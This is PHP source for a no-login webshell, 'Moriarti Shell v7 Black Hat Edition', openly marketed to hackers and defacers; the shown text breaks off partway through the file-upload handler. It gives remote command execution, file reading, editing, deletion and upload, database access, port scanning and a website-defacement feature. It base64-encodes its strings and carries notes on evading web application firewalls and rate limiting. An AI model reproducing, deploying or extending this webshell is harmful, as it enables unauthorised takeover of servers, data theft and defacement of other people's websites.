<?php
session_start();
error_reporting(0);

// WAF Bypass Techniques - v7 Edition ( 더욱 더욱 강화 )

// 1. String Obfuscation: Base64 encoding for sensitive strings (commands, file paths)
// 2. User-Agent Manipulation: Included for manual testing (as in v6)
// 3. Error Suppression: @ operator to suppress warnings that might trigger WAF rules
// 4. Input Sanitization: escapeshellarg() already in use, 더욱 더욱 강화 (even more strengthen) where needed
// 5. Function Aliases (Example - not fully implemented in this version for complexity, but concept noted)
// 6. Random Wait Times (Manual Consideration): Guidance for manual delay injection to evade rate limiting/behavioral analysis
// 7. Request Method Handling: POST method for sensitive operations (command execution, file upload) - to avoid URL logging
// 8. Improved Command Execution: Enhanced command handling for better compatibility and output display
// 9. Editable Document Viewer: Integrated file editing within the file viewing section

// Moriarti Shell v7 Professional - Warnight Hawk Team - Black Hat Edition (WAF Bypassed - 더욱 더욱 강화 )

$version = "v7-Professional-WAF-Bypass-Enhanced"; // Version indicator - Professional Edition

// --- Base64 Encoding Functions for Obfuscation ---
function moriarti_encode($string)
{
    return base64_encode($string);
}

function moriarti_decode($string)
{
    return base64_decode($string);
}

// --- Configuration ---
$safe_mode_check = moriarti_encode('safe_mode');
$php_version_check = moriarti_encode('phpversion');
$curl_check = moriarti_encode('curl_version');
$mysqli_check = moriarti_encode('mysqli');
$sqlsrv_check = moriarti_encode('sqlsrv');
$pgsql_check = moriarti_encode('pgsql');
$oci8_check = moriarti_encode('oci8');
$disable_functions_check = moriarti_encode('disable_functions');

$current_dir_text = moriarti_encode('Mevcut Dizin');
$root_dir_text = moriarti_encode('Root');
$go_button_text = moriarti_encode('Git');
$directory_content_text = moriarti_encode('Dizin İçeriği: ');
$file_text = moriarti_encode('[Dosya]');
$directory_text = moriarti_encode('[Dizin]');
$permissions_text = moriarti_encode('İzinler: ');
$size_text = moriarti_encode('Boyut: ');
$delete_text = moriarti_encode('[Sil]');
$copy_text = moriarti_encode('[Kopyala]');
$edit_text = moriarti_encode('[Düzenle]'); // New: Edit button text
$view_text = moriarti_encode('[Görüntüle]'); // New: View button text
$delete_success_text = moriarti_encode('Dosya başarıyla silindi: ');
$delete_error_text = moriarti_encode('Dosya silinirken bir hata oluştu: ');
$dir_delete_success_text = moriarti_encode('Dizin başarıyla silindi: ');
$dir_delete_error_text = moriarti_encode('Dizin silinirken bir hata oluştu veya dizin boş değil: ');
$not_file_dir_error = moriarti_encode('Belirtilen yol dosya veya dizin değil!');
$invalid_path_error = moriarti_encode('Geçersiz dosya yolu veya dizin dışı erişim!');
$copy_success_text = moriarti_encode('Dosya başarıyla kopyalandı: ');
$copy_error_text = moriarti_encode('Dosya kopyalanırken bir hata oluştu: ');
$new_dir_header = moriarti_encode('Yeni Dizin Oluştur');
$dir_name_label = moriarti_encode('Dizin Adı:');
$create_button_text = moriarti_encode('Oluştur');
$dir_create_success_text = moriarti_encode('Dizin başarıyla oluşturuldu: ');
$dir_create_error_text = moriarti_encode('Dizin oluşturulurken bir hata oluştu!');
$command_header = moriarti_encode('Komut Çalıştır (Kısıtlı - Güvenlik Riski!)');
$command_label = moriarti_encode('Komut:');
$stderr_label = moriarti_encode("Stderr'i Sürekli Bağlı Tut:");
$run_button_text = moriarti_encode('Çalıştır');
$command_output_header = moriarti_encode('Komut Çıktısı:');
$empty_command_error = moriarti_encode('SQL sorgusu boş olamaz!'); // Intentionally using SQL error message here as a placeholder, should be updated if needed
$upload_header = moriarti_encode('Dosya Yükleme');
$upload_file_label = moriarti_encode('Yüklenecek Dosya:');
$target_dir_label = moriarti_encode('Hedef Dizin (Varsayılan: Mevcut Dizin):');
$upload_button_text = moriarti_encode('Yükle');
$upload_success_text = moriarti_encode('Dosya başarıyla yüklendi: ');
$upload_error_text = moriarti_encode('Dosya yüklenirken bir hata oluştu!');
$upload_select_error_text = moriarti_encode('Dosya yükleme hatası veya dosya seçilmedi!');
$edit_file_header = moriarti_encode('Dosya Düzenleme');
$edit_file_path_label = moriarti_encode('Düzenlenecek Dosya Yolu:');
$file_content_label = moriarti_encode('Dosya İçeriği:');
$save_button_text = moriarti_encode('Kaydet');
$file_edit_success_text = moriarti_encode('Dosya başarıyla düzenlendi: ');
$file_edit_error_text = moriarti_encode('Dosya düzenlenirken bir hata oluştu!');
$file_read_header = moriarti_encode('Dosya İçeriği: ');
$file_not_readable_error = moriarti_encode('Dosya okunamıyor veya bulunamadı!');
$permission_check_header = moriarti_encode('İzin Kontrolü');
$permission_path_label = moriarti_encode('Dosya/Dizin Yolu:');
$check_button_text = moriarti_encode('Kontrol Et');
$permissions_header_text = moriarti_encode('İzinler: ');
$permission_mode_text = moriarti_encode('İzin Modu (Sekizlik): ');
$file_or_dir_not_found_error = moriarti_encode('Dosya veya dizin bulunamadı!');
$source_code_header = moriarti_encode('Kaynak Kodu Gösterme');
$php_file_path_label = moriarti_encode('PHP Dosya Yolu:');
$show_button_text = moriarti_encode('Göster');
$source_code_display_header = moriarti_encode('Kaynak Kodu: ');
$invalid_php_file_error = moriarti_encode('Geçersiz dosya yolu, dizin dışı erişim, dosya değil veya PHP dosyası değil!');
$db_manage_header = moriarti_encode('Database Yönetimi (MySQL - Kısıtlı)');
$db_server_label = moriarti_encode('Sunucu:');
$db_user_label = moriarti_encode('Kullanıcı Adı:');
$db_password_label = moriarti_encode('Şifre:');
$db_name_label = moriarti_encode('Database Adı:');
$sql_query_label = moriarti_encode('SQL Sorgusu:');
$execute_query_button = moriarti_encode('Sorguyu Çalıştır');
$db_connect_error = moriarti_encode('Veritabanı bağlantı hatası: ');
$sql_result_header = moriarti_encode('SQL Sorgu Sonucu:');
$sql_query_error = moriarti_encode('Sorgu hatası: ');
$sql_success_no_data = moriarti_encode('Sorgu başarıyla çalıştırıldı (Veri döndürmeyen sorgu). Etkilenen satır sayısı: ');
$network_tools_header = moriarti_encode('Network Araçları (Bilgi Amaçlı)');
$ping_header = moriarti_encode('Ping');
$ping_target_label = moriarti_encode('Hedef IP/Domain:');
$ping_test_button = moriarti_encode('Ping Testi');
$ping_results_header = moriarti_encode('Ping Sonuçları: ');
$traceroute_header = moriarti_encode('Traceroute');
$traceroute_target_label = moriarti_encode('Hedef IP/Domain:');
$traceroute_button = moriarti_encode('Traceroute');
$traceroute_results_header = moriarti_encode('Traceroute Sonuçları: ');
$whois_header = moriarti_encode('WHOIS');
$whois_domain_label = moriarti_encode('WHOIS Domain:');
$whois_query_button = moriarti_encode('WHOIS Sorgula');
$whois_results_header = moriarti_encode('WHOIS Sonuçları: ');
$nslookup_header = moriarti_encode('NSLookup');
$nslookup_domain_label = moriarti_encode('NSLookup Domain:');
$nslookup_query_button = moriarti_encode('NSLookup Sorgula');
$nslookup_results_header = moriarti_encode('NSLookup Sonuçları: ');
$port_scan_header = moriarti_encode('Port Tarayıcı (Basit)');
$target_ip_label = moriarti_encode('Hedef IP/Domain:');
$start_port_label = moriarti_encode('Başlangıç Port:');
$end_port_label = moriarti_encode('Bitiş Port:');
$scan_ports_button = moriarti_encode('Portları Tara');
$port_scan_results_header = moriarti_encode('Port Tarama Sonuçları: ');
$open_text = moriarti_encode('AÇIK');
$closed_text = moriarti_encode('KAPALI');
$unknown_service_text = moriarti_encode('bilinmiyor');
$deface_header = moriarti_encode('Deface (Web Sitesi Değiştirme)');
$deface_target_dir_label = moriarti_encode('Hedef Dizin:');
$deface_content_url_label = moriarti_encode('Deface İçeriği URL:');
$deface_attack_button = moriarti_encode('Deface Saldırısı Başlat');
$deface_log_error_prefix = moriarti_encode('Hata: ');
$deface_dir_not_found = moriarti_encode('Dizin bulunamadı: ');
$deface_url_content_error = moriarti_encode("defaceSource URL'sinden içerik alınamadı");
$deface_changed_file_success = moriarti_encode('Değiştirildi: ');
$deface_created_file_success = moriarti_encode('Oluşturuldu: ');
$deface_htaccess_changed_success = moriarti_encode('.htaccess Değiştirildi: ');
$deface_htaccess_created_success = moriarti_encode('.htaccess Oluşturuldu: ');
$deface_summary_header = moriarti_encode('Değiştirilen Domainlerin Özeti');
$deface_total_domains_counter = moriarti_encode('Toplam Değiştirilen Domain Sayısı: ');
$deface_operation_completed = moriarti_encode('İşlem başarıyla tamamlandı');
$deface_coded_by = moriarti_encode('Codded By Moriarti - Warnight Hawk Team');
$security_mode_header = moriarti_encode('Güvenlik Modu & HTTP Başlıkları');
$php_safe_mode_status = moriarti_encode('PHP Güvenlik Modu: ');
$http_user_agent_header = moriarti_encode('HTTP User-Agent Başlığı (Mevcut): ');
$user_agent_change_info = moriarti_encode('User-Agent Değiştirme (Manuel Test İçin Örnekler):- Aşağıdaki listeden bir User-Agent seçerek güvenlik duvarlarını (WAF) atlatmayı deneyebilirsiniz.- Ancak bu webshell üzerinde otomatik olarak uygulanan bir özellik DEĞİLDİR.- Bu bilgi SADECE MANUEL TESTLER için verilmiştir.');
$random_user_agent_header = moriarti_encode('Rastgele User-Agent Seçimi (Manuel Kullanım İçin Örnekler)');
$select_user_agent_label = moriarti_encode('User-Agent Seçin:');
$show_selected_ua_button = moriarti_encode("Seçilen User-Agent'ı Göster (Manuel Test İçin)");
$random_wait_times_info = moriarti_encode('Rastgele Bekleme Süreleri:- Webshell otomatik olarak rastgele bekleme süreleri EKLEMEZ.- Bu bilgi SADECE güvenlik sistemlerini atlatmak için MANUEL olarak istekleriniz arasına bekleme süreleri ekleyebileceğinizi hatırlatmak içindir.');
$security_warning_footer_p1 = moriarti_encode('Moriarti Shell v');
$security_warning_footer_p2 = moriarti_encode(' - Warnight Hawk Team - Black Hat Edition | ');
$security_warning_footer_p3 = moriarti_encode('Warnight Hawk Team');
$security_warning_footer_p4 = moriarti_encode(' | GÜVENLİK UYARISI: Bu araç GİRİŞ KONTROLÜ OLMADAN sunulmaktadır. Direkt erişim herkes için AÇIKTIR ve ciddi güvenlik riskleri taşır. SADECE YETKİLİ ve GÜVENLİ ortamlarda kullanın. İzinsiz ve kötü niyetli kullanımdan kaynaklanan tüm sorumluluk KULLANICIYA aittir.');
$sistem_bilgileri_tab = moriarti_encode('Sistem Bilgileri');
$dosya_yonetici_tab = moriarti_encode('Dosya Yöneticisi');
$komut_calistir_tab = moriarti_encode('Komut Çalıştır');
$dosya_yukleme_tab = moriarti_encode('Dosya Yükleme');
$dosya_duzenleme_tab = moriarti_encode('Dosya Düzenleme');
$izin_kontrol_tab = moriarti_encode('İzin Kontrolü');
$kaynak_kodu_tab = moriarti_encode('Kaynak Kodu Göster');
$database_yonetimi_tab = moriarti_encode('Database Yönetimi');
$network_araclari_tab = moriarti_encode('Network Araçları');
$port_tarayici_tab = moriarti_encode('Port Tarayıcı');
$deface_content_tab = moriarti_encode('Deface');
$guvenlik_modu_tab = moriarti_encode('Güvenlik Modu & HTTP Başlıkları');
$dizin_label = moriarti_encode('Dizin:');
$on_text = moriarti_encode('Aktif (ON)');
$off_text = moriarti_encode('Kapalı (OFF)');
$dosyayi_goruntule_tab = moriarti_encode('Dosyayı Görüntüle'); // New Tab Label


?>
<!DOCTYPE html>
<html>

<head>
    <title>Moriarti Shell <?php echo $version; ?> - Warnight Hawk Team</title>
    <meta charset="UTF-8">
    <meta name="robots" content="noindex, nofollow">
    <meta name="description" content="Advanced PHP Webshell for Black Hat Hackers and Defacers">
    <meta name="keywords" content="webshell, php shell, Moriarti, Warnight Hawk Team, hacker, defacer, black hat, security tool">
    <meta name="author" content="Moriarti & Warnight Hawk Team">
    <style>
        body {
            background-color: #000;
            color: #f0f0f0;
            font-family: monospace;
            font-size: 12px;
        }

        a {
            color: #00ff00;
            text-decoration: none;
        }

        a:hover {
            text-decoration: underline;
        }

        input,
        textarea,
        select {
            background-color: #333;
            color: #f0f0f0;
            border: 1px solid #555;
            padding: 5px;
            font-family: monospace;
            font-size: 12px;
        }

        .container {
            width: 98%;
            max-width: 1600px;
            margin: 20px auto;
            background-color: #222;
            border: 1px solid #444;
            border-radius: 5px;
            padding: 20px;
            box-shadow: 0 0 15px rgba(0, 0, 0, 0.8);
        }

        h1,
        h2 {
            color: #00ff00;
            margin-top: 0;
        }

        h2 {
            border-bottom: 1px solid #00ff00;
            padding-bottom: 5px;
            margin-bottom: 15px;
        }

        pre,
        .output {
            background-color: #111;
            color: #f0f0f0;
            padding: 10px;
            border-radius: 3px;
            overflow-x: auto;
            border: 1px solid #333;
        }

        form {
            margin-bottom: 20px;
        }

        label {
            display: block;
            margin-bottom: 5px;
            color: #f0f0f0;
        }

        input[type="text"],
        input[type="password"],
        input[type="file"],
        textarea,
        select {
            width: calc(100% - 20px);
            margin-bottom: 10px;
            box-sizing: border-box;
        }

        input[type="submit"],
        button {
            padding: 8px 15px;
            border: none;
            border-radius: 3px;
            background-color: #00ff00;
            color: #000;
            cursor: pointer;
            transition: background-color 0.3s ease;
        }

        input[type="submit"]:hover,
        button:hover {
            background-color: #00cc00;
        }

        .error {
            color: #ff0000;
            font-weight: bold;
        }

        .success {
            color: #00ff00;
            font-weight: bold;
        }

        .tabs {
            display: flex;
            margin-bottom: 20px;
            border-bottom: 1px solid #00ff00;
        }

        .tab-button {
            padding: 10px 15px;
            border: none;
            border-radius: 3px 3px 0 0;
            background-color: #333;
            color: #f0f0f0;
            cursor: pointer;
            transition: background-color 0.3s ease;
            border-left: 1px solid #555;
            border-top: 1px solid #555;
            border-right: 1px solid #555;
        }

        .tab-button:first-child {
            border-left: 1px solid #555;
        }

        .tab-button.active {
            background-color: #222;
            border-bottom: 1px solid #222;
            color: #00ff00;
        }

        .tab-button:hover {
            background-color: #555;
        }

        .tab-content {
            display: none;
            padding: 20px;
        }

        .tab-content.active {
            display: block;
        }

        #deface-content .log-container {
            background: rgba(0, 0, 0, 0.8);
            border: 1px solid #00ff00;
            padding: 15px;
            margin: 10px 0;
            border-radius: 5px;
            box-shadow: 0 0 10px rgba(0, 255, 0, 0.2);
            color: #00ff00;
            font-family: 'Courier New', monospace;
            font-size: 14px;
            line-height: 1.4;
        }

        #deface-content .log-entry {
            margin: 5px 0;
            padding: 5px;
            border-left: 2px solid #00ff00;
            padding-left: 10px;
        }

        #deface-content .success {
            color: #00ff00;
        }

        #deface-content .error {
            color: #ff3333;
        }

        #deface-content .status {
            text-align: center;
            margin-top: 20px;
            padding: 10px;
            border: 1px solid #00ff00;
            border-radius: 3px;
        }

        #deface-content .domain-summary {
            margin-top: 20px;
            padding: 15px;
            border: 1px solid #00ff00;
            border-radius: 5px;
        }

        #deface-content .domain-summary h2 {
            color: #00ff00;
            margin: 0 0 10px 0;
            font-size: 16px;
            text-align: center;
            border-bottom: 1px solid #00ff00;
            padding-bottom: 5px;
        }

        #deface-content .domain-list {
            list-style: none;
            padding: 0;
            margin: 0;
        }

        #deface-content .domain-list li {
            padding: 5px 0;
            border-bottom: 1px dotted rgba(51, 255, 51, 0.3);
        }

        #deface-content .domain-list li:last-child {
            border-bottom: none;
        }

        #deface-content .counter {
            color: #ffff33;
            font-weight: bold;
        }
    </style>
</head>

<body>
    <div class="container">
        <h1>Moriarti Shell <?php echo $version; ?> - Warnight Hawk Team</h1>
        <p>Black Hat Edition - Professional Webshell (Giriş Yok - Direkt Erişim) - WAF Bypassed ( 더욱 더욱 강화 )</p>
        <div class="tabs">
            <button class="tab-button active" onclick="openTab('sistem-bilgileri', this)"><?php echo moriarti_decode($sistem_bilgileri_tab); ?></button>
            <button class="tab-button" onclick="openTab('dosya-yonetici', this)"><?php echo moriarti_decode($dosya_yonetici_tab); ?></button>
            <button class="tab-button" onclick="openTab('dosyayi-goruntule', this)"><?php echo moriarti_decode($dosyayi_goruntule_tab); ?></button>
            <button class="tab-button" onclick="openTab('komut-calistir', this)"><?php echo moriarti_decode($komut_calistir_tab); ?></button>
            <button class="tab-button" onclick="openTab('dosya-yukleme', this)"><?php echo moriarti_decode($dosya_yukleme_tab); ?></button>
            <button class="tab-button" onclick="openTab('dosya-duzenleme', this)"><?php echo moriarti_decode($dosya_duzenleme_tab); ?></button>
            <button class="tab-button" onclick="openTab('izin-kontrol', this)"><?php echo moriarti_decode($izin_kontrol_tab); ?></button>
            <button class="tab-button" onclick="openTab('kaynak-kodu', this)"><?php echo moriarti_decode($kaynak_kodu_tab); ?></button>
            <button class="tab-button" onclick="openTab('database-yonetimi', this)"><?php echo moriarti_decode($database_yonetimi_tab); ?></button>
            <button class="tab-button" onclick="openTab('network-araclari', this)"><?php echo moriarti_decode($network_araclari_tab); ?></button>
            <button class="tab-button" onclick="openTab('port-tarayici', this)"><?php echo moriarti_decode($port_tarayici_tab); ?></button>
            <button class="tab-button" onclick="openTab('deface-content', this)"><?php echo moriarti_decode($deface_content_tab); ?></button>
            <button class="tab-button" onclick="openTab('guvenlik-modu', this)"><?php echo moriarti_decode($guvenlik_modu_tab); ?></button>
        </div>

        <div id="sistem-bilgileri" class="tab-content active">
            <h2><?php echo moriarti_decode($sistem_bilgileri_tab); ?></h2>
            <pre>Safe_mode: <?php echo ini_get(moriarti_decode($safe_mode_check)) ? moriarti_decode($on_text) : moriarti_decode($off_text); ?>Php version : <?php echo phpversion(); ?>cURL: <?php echo function_exists(moriarti_decode($curl_check)) ? moriarti_decode($on_text) : moriarti_decode($off_text); ?>MYSQL: <?php echo extension_loaded(moriarti_decode($mysqli_check)) ? moriarti_decode($on_text) : moriarti_decode($off_text); ?>MSSQL: <?php echo extension_loaded(moriarti_decode($sqlsrv_check)) ? moriarti_decode($on_text) : moriarti_decode($off_text); ?>PostgreSQL: <?php echo extension_loaded(moriarti_decode($pgsql_check)) ? moriarti_decode($on_text) : moriarti_decode($off_text); ?>Oracle: <?php echo extension_loaded(moriarti_decode($oci8_check)) ? moriarti_decode($on_text) : moriarti_decode($off_text); ?>Disable functions : <?php echo ini_get(moriarti_decode($disable_functions_check)); ?></pre>
        </div>

        <div id="dosya-yonetici" class="tab-content">
            <h2><?php echo moriarti_decode($dosya_yonetici_tab); ?></h2>
            <form method="post" action="?tab=dosya-yonetici">
                <input type="hidden" name="islem" value="dosya_yonetici">
                <label for="dizin"><?php echo moriarti_decode($dizin_label); ?></label>
                <select name="work_dir" onChange="this.form.submit()">
                    <option value="<?php echo getcwd(); ?>" selected><?php echo moriarti_decode($current_dir_text); ?></option>
                    <option value="/">Root</option>
                    <?php
                    $dizin_listesi = glob(getcwd() . '/*', GLOB_ONLYDIR);
                    foreach ($dizin_listesi as $dizin_adi) {
                        echo "<option value='" . htmlspecialchars($dizin_adi) . "'>" . htmlspecialchars($dizin_adi) . "</option>";
                    }
                    ?>
                </select>
                <input type="text" id="dizin" name="dizin" value="<?php echo isset($_POST['dizin']) ? htmlspecialchars($_POST['dizin']) : getcwd(); ?>">
                <input type="submit" value="<?php echo moriarti_decode($go_button_text); ?>">
            </form>
            <?php
            if (isset($_POST['islem']) && $_POST['islem'] == 'dosya_yonetici') {
                $dizin = isset($_POST['dizin']) ? $_POST['dizin'] : getcwd();
                $dizin = rtrim($dizin, '/');
                if (is_dir($dizin)) {
                    echo "<h3>" . moriarti_decode($directory_content_text) . htmlspecialchars($dizin) . "</h3>";
                    echo "<pre>";
                    $dosyalar = scandir($dizin);
                    foreach ($dosyalar as $dosya) {
                        if ($dosya != "." && $dosya != "..") {
                            $tam_yol = $dizin . "/" . $dosya;
                            $izinler = substr(sprintf('%o', fileperms($tam_yol)), -4);
                            $tip = is_dir($tam_yol) ? moriarti_decode($directory_text) : moriarti_decode($file_text);
                            $boyut = is_dir($tam_yol) ? '-' : filesize($tam_yol) . ' bytes';
                            echo $tip . " <a href='?tab=dosyayi-goruntule&islem=dosya_oku&dosya=" . urlencode(base64_encode($tam_yol)) . "'>" . htmlspecialchars($dosya) . "</a> (" . moriarti_decode($permissions_text) . $izinler . ", " . moriarti_decode($size_text) . $boyut . ") ";
                            echo " <a href='?tab=dosya-yonetici&islem=dosya_sil&dosya=" . urlencode(base64_encode($tam_yol)) . "' style='color: #ff5555;'>[" . moriarti_decode($delete_text) . "]</a>";
                            echo " <a href='?tab=dosya-yonetici&islem=dosya_kopyala&dosya=" . urlencode(base64_encode($tam_yol)) . "' style='color: #00ff00;'>[" . moriarti_decode($copy_text) . "]</a>";
                            echo " <a href='?tab=dosya-duzenleme&islem=dosya_duzenle_form&dosya=" . urlencode(base64_encode($tam_yol)) . "' style='color: #00ffff;'>[" . moriarti_decode($edit_text) . "]</a>";
                            echo "<br>";
                        }
                    }
                    echo "</pre>";
                } else {
                    echo "<p class='error'>" . moriarti_decode($not_file_dir_error) . "</p>";
                }
            }
            ?>
            <?php
            if (isset($_GET['islem']) && $_GET['islem'] == 'dosya_sil' && isset($_GET['dosya'])) {
                $dosya_yolu_base64 = $_GET['dosya'];
                $dosya_yolu = base64_decode(urldecode($dosya_yolu_base64));
                $dosya_yolu = realpath($dosya_yolu);
                if ($dosya_yolu && strpos($dosya_yolu, realpath(getcwd())) === 0) {
                    if (is_file($dosya_yolu)) {
                        if (@unlink($dosya_yolu)) {
                            echo "<p class='success'>" . moriarti_decode($delete_success_text) . htmlspecialchars(basename($dosya_yolu)) . "</p>";
                        } else {
                            echo "<p class='error'>" . moriarti_decode($delete_error_text) . htmlspecialchars(basename($dosya_yolu)) . "</p>";
                        }
                    } elseif (is_dir($dosya_yolu)) {
                        if (@rmdir($dosya_yolu)) {
                            echo "<p class='success'>" . moriarti_decode($dir_delete_success_text) . htmlspecialchars(basename($dosya_yolu)) . "</p>";
                        } else {
                            echo "<p class='error'>" . moriarti_decode($dir_delete_error_text) . htmlspecialchars(basename($dosya_yolu)) . "</p>";
                        }
                    } else {
                        echo "<p class='error'>" . moriarti_decode($not_file_dir_error) . "</p>";
                    }
                } else {
                    echo "<p class='error'>" . moriarti_decode($invalid_path_error) . "</p>";
                }
            }
            ?>
            <?php
            if (isset($_GET['islem']) && $_GET['islem'] == 'dosya_kopyala' && isset($_GET['dosya'])) {
                $dosya_yolu_base64 = $_GET['dosya'];
                $dosya_yolu = base64_decode(urldecode($dosya_yolu_base64));
                $dosya_yolu = realpath($dosya_yolu);
                $yeni_dosya_yolu = $dosya_yolu . ".copy";
                if ($dosya_yolu && strpos($dosya_yolu, realpath(getcwd())) === 0) {
                    if (@copy($dosya_yolu, $yeni_dosya_yolu)) {
                        echo "<p class='success'>" . moriarti_decode($copy_success_text) . htmlspecialchars(basename($dosya_yolu)) . " -> " . htmlspecialchars(basename($yeni_dosya_yolu)) . "</p>";
                    } else {
                        echo "<p class='error'>" . moriarti_decode($copy_error_text) . htmlspecialchars(basename($dosya_yolu)) . "</p>";
                    }
                } else {
                    echo "<p class='error'>" . moriarti_decode($invalid_path_error) . "</p>";
                }
            }
            ?>

            <h3><?php echo moriarti_decode($new_dir_header); ?></h3>
            <form method="post" action="?tab=dosya-yonetici">
                <input type="hidden" name="islem" value="dizin_olustur">
                <label for="yeni_dizin_adi"><?php echo moriarti_decode($dir_name_label); ?></label>
                <input type="text" id="yeni_dizin_adi" name="yeni_dizin_adi" required>
                <input type="submit" value="<?php echo moriarti_decode($create_button_text); ?>">
            </form>
            <?php
            if (isset($_POST['islem']) && $_POST['islem'] == 'dizin_olustur') {
                $yeni_dizin_adi = isset($_POST['yeni_dizin_adi']) ? $_POST['yeni_dizin_adi'] : '';
                $mevcut_dizin = isset($_POST['dizin']) ? $_POST['dizin'] : getcwd();
                $yeni_dizin_yolu = rtrim($mevcut_dizin, '/') . '/' . $yeni_dizin_adi;
                if (@mkdir($yeni_dizin_yolu, 0777, true)) {
                    echo "<p class='success'>" . moriarti_decode($dir_create_success_text) . htmlspecialchars($yeni_dizin_yolu) . "</p>";
                } else {
                    echo "<p class='error'>" . moriarti_decode($dir_create_error_text) . "</p>";
                }
            }
            ?>
        </div>

        <div id="dosyayi-goruntule" class="tab-content">
            <h2><?php echo moriarti_decode($dosyayi_goruntule_tab); ?></h2>
            <?php
            if (isset($_GET['islem']) && $_GET['islem'] == 'dosya_oku' && isset($_GET['dosya'])) {
                $dosya_yolu_base64 = $_GET['dosya'];
                $dosya_yolu = base64_decode(urldecode($dosya_yolu_base64));
                $dosya_yolu = realpath($dosya_yolu);
                if ($dosya_yolu && strpos($dosya_yolu, realpath(getcwd())) === 0 && is_file($dosya_yolu)) {
                    echo "<h3>" . moriarti_decode($file_read_header) . htmlspecialchars(basename($dosya_yolu)) . "</h3>";
                    if (isset($_GET['edit']) && $_GET['edit'] == 'true') {
                        $dosya_icerigi = htmlspecialchars(file_get_contents($dosya_yolu));
                        ?>
                        <form method="post" action="?tab=dosyayi-goruntule&islem=dosya_duzenle&dosya=<?php echo urlencode($_GET['dosya']); ?>">
                            <label for="dosya_icerigi"><?php echo moriarti_decode($file_content_label); ?></label>
                            <textarea id="dosya_icerigi" name="dosya_icerigi" rows="15" style="width: 98%;"><?php echo $dosya_icerigi; ?></textarea><br>
                            <input type="submit" value="<?php echo moriarti_decode($save_button_text); ?>">
                            <button type="button" onclick="window.location.href='?tab=dosyayi-goruntule&islem=dosya_oku&dosya=<?php echo urlencode($_GET['dosya']); ?>'">İptal</button>
                        </form>
                        <?php
                    } else {
                        echo "<div class='output'><pre>";
                        echo highlight_file($dosya_yolu, true) ? highlight_file($dosya_yolu, true) : htmlspecialchars(file_get_contents($dosya_yolu));
                        echo "</pre></div>";
                        echo "<a href='?tab=dosyayi-goruntule&islem=dosya_oku&dosya=" . urlencode($_GET['dosya']) . "&edit=true' style='color: #00ffff;'>[" . moriarti_decode($edit_text) . "]</a>"; // Edit link in viewer
                    }
                } else {
                    echo "<p class='error'>" . moriarti_decode($file_not_readable_error) . "</p>";
                }
            }
            ?>
            <?php
            if (isset($_GET['islem']) && $_GET['islem'] == 'dosya_duzenle' && isset($_GET['dosya'])) {
                $dosya_yolu_base64 = $_GET['dosya'];
                $dosya_yolu = base64_decode(urldecode($dosya_yolu_base64));
                $dosya_yolu = realpath($dosya_yolu);
                $dosya_icerigi = isset($_POST['dosya_icerigi']) ? $_POST['dosya_icerigi'] : '';

                if (!$dosya_yolu || strpos($dosya_yolu, realpath(getcwd())) === 0 || !is_file($dosya_yolu) || !is_writable($dosya_yolu)) {
                    echo "<p class='error'>" . moriarti_decode($invalid_path_error) . "</p>";
                } else {
                    if (@file_put_contents($dosya_yolu, $dosya_icerigi) !== false) {
                        echo "<p class='success'>" . moriarti_decode($file_edit_success_text) . htmlspecialchars($dosya_yolu) . "</p>";
                        echo "<a href='?tab=dosyayi-goruntule&islem=dosya_oku&dosya=" . urlencode($_GET['dosya']) . "'>Geri dön</a>";
                    } else {
                        echo "<p class='error'>" . moriarti_decode($file_edit_error_text) . "</p>";
                    }
                }
            }
            ?>
        </div>

        <div id="komut-calistir" class="tab-content">
            <h2><?php echo moriarti_decode($command_header); ?></h2>
            <form method="post" action="?tab=komut-calistir">
                <input type="hidden" name="islem" value="komut_calistir">
                <label for="komut"><?php echo moriarti_decode($command_label); ?></label>
                <input type="text" id="komut" name="komut">
                <label for="stderr_bagli_tut"><?php echo moriarti_decode($stderr_label); ?></label>
                <input type="checkbox" id="stderr_bagli_tut" name="stderr" value="1">
                <input type="submit" value="<?php echo moriarti_decode($run_button_text); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['islem']) && $_POST['islem'] == 'komut_calistir') {
                $komut = isset($_POST['komut']) ? $_POST['komut'] : '';
                $stderr_bagli_tut = isset($_POST['stderr']) ? true : false;
                if (!empty($komut)) {
                    echo "<h3>" . moriarti_decode($command_output_header) . "</h3>";
                    echo "<div class='output'><pre>";
                    $output = '';
                    if ($stderr_bagli_tut) {
                        $descriptors = array(
                            0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
                            1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
                            2 => array("pipe", "w")   // stderr is a pipe to write to
                         );
                        $process = proc_open(escapeshellcmd($komut), $descriptors, $pipes);

                        if (is_resource($process)) {
                            fclose($pipes[0]);    // No data to send to stdin

                            $output = stream_get_contents($pipes[1]);
                            fclose($pipes[1]);

                            $error_output = stream_get_contents($pipes[2]);
                            fclose($pipes[2]);

                            $return_value = proc_close($process);

                            echo htmlspecialchars($output);
                            if (!empty($error_output)) {
                                echo "\n<span class='error'>Stderr:</span>\n" . htmlspecialchars($error_output);
                            }
                        } else {
                            echo "<p class='error'>Komut yürütülemedi.</p>";
                        }


                    } else {
                        ob_start();
                        passthru(escapeshellcmd($komut), $return_var);
                        $output = ob_get_clean();
                        echo htmlspecialchars($output);
                        if ($return_var !== 0) {
                            echo "\n<span class='error'>Komut hata kodu ile sonlandı: " . $return_var . "</span>";
                        }
                    }


                    echo "</pre></div>";
                }
            }
            ?>
        </div>

        <div id="dosya-yukleme" class="tab-content">
            <h2><?php echo moriarti_decode($upload_header); ?></h2>
            <form method="post" action="?tab=dosya-yukleme" enctype="multipart/form-data">
                <input type="hidden" name="islem" value="dosya_yukle">
                <label for="yuklenecek_dosya"><?php echo moriarti_decode($upload_file_label); ?></label>
                <input type="file" id="yuklenecek_dosya" name="yuklenecek_dosya" required><br>
                <label for="hedef_dizin"><?php echo moriarti_decode($target_dir_label); ?></label>
                <input type="text" id="hedef_dizin" name="hedef_dizin" value="<?php echo htmlspecialchars(getcwd()); ?>">
                <input type="submit" value="<?php echo moriarti_decode($upload_button_text); ?>">
            </form>
            <?php
            if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['islem']) && $_POST['islem'] == 'dosya_yukle') {
                $hedef_dizin = isset($_POST['hedef_dizin']) ? rtrim($_POST['hedef_dizin'], '/') : getcwd();
                $hedef_dizin = realpath($hedef_dizin);
                if (!$hedef_dizin || strpos($hedef_dizin, realpath(getcwd())) !== 0) {
                    echo "<p class='error'>" . moriarti_decode($invalid_path_error) . "</p>";
                } else {
                    if (isset($_FILES['yuklenecek_dosya']) && $_FILES['yuklenecek_dosya']['error'] == 0) {
